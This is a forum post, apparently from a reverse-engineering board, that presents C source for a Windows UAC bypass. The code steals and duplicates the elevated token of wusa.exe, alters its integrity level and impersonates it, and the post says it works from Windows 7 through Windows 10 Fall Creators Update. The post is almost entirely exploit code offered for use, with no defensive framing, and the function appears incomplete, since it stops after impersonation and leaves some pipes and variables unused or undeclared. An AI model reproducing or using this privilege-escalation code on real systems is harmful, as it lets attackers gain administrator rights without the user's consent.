#1
|
|||
|
|||
Uac bypass implementation
This is an implementation of uac bypass method (Author: CIA & James Forshaw).
Works from windows 7 to latest windows 10 fall creators update. Code:
int StepOverUAC() { SECURITY_ATTRIBUTES sa; sa.nLength = sizeof(SECURITY_ATTRIBUTES); sa.bInheritHandle = TRUE; sa.lpSecurityDescriptor = NULL; if (!CreatePipe(&inRead, &inWrite, &sa, 0)) return 0; if (!CreatePipe(&outRead, &outWrite, &sa, 0)) return 0; NtSetInformationToken nt = (NtSetInformationToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtSetInformationToken"); RtlLengthSid rts = (RtlLengthSid)GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlLengthSid"); NtFilterToken filter = (NtFilterToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtFilterToken"); DWORD Error, bytesIO; NTSTATUS Status; HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; HANDLE filterToken = NULL; BOOL bCond = FALSE; SHELLEXECUTEINFO shinfo, sh; SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; TOKEN_MANDATORY_LABEL tml, *ptml; PSID pIntegritySid = NULL; STARTUPINFO si, si2; PROCESS_INFORMATION pi, pi2; WCHAR szBuffer[MAX_PATH]; RtlSecureZeroMemory(&shinfo, sizeof(shinfo)); shinfo.cbSize = sizeof(shinfo); shinfo.fMask = SEE_MASK_NOCLOSEPROCESS; shinfo.lpFile = L"wusa.exe"; shinfo.nShow = SW_HIDE; if (!ShellExecuteEx(&shinfo)) return 0; if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken)) return 0; TerminateProcess(shinfo.hProcess, -1); WaitForSingleObject(shinfo.hProcess, -1); if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) return 0; if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID,0, 0, 0, 0, 0, 0, 0, &pIntegritySid)) return 0; tml.Label.Attributes = SE_GROUP_INTEGRITY; tml.Label.Sid = pIntegritySid; Status = nt(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml)); if (!NT_SUCCESS(Status)) return 0; filter(hNewToken, 0x4, NULL, NULL, NULL, &filterToken); if (!ImpersonateLoggedOnUser(filterToken)) return 0; } |
|
|
Similar Threads | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
Armadilled Programs with Custom Implementation | TmC | General Discussion | 3 | 05-15-2006 08:58 |
Implementation of a TrustedFlow System Prototype | redbull | General Discussion | 0 | 06-24-2005 21:57 |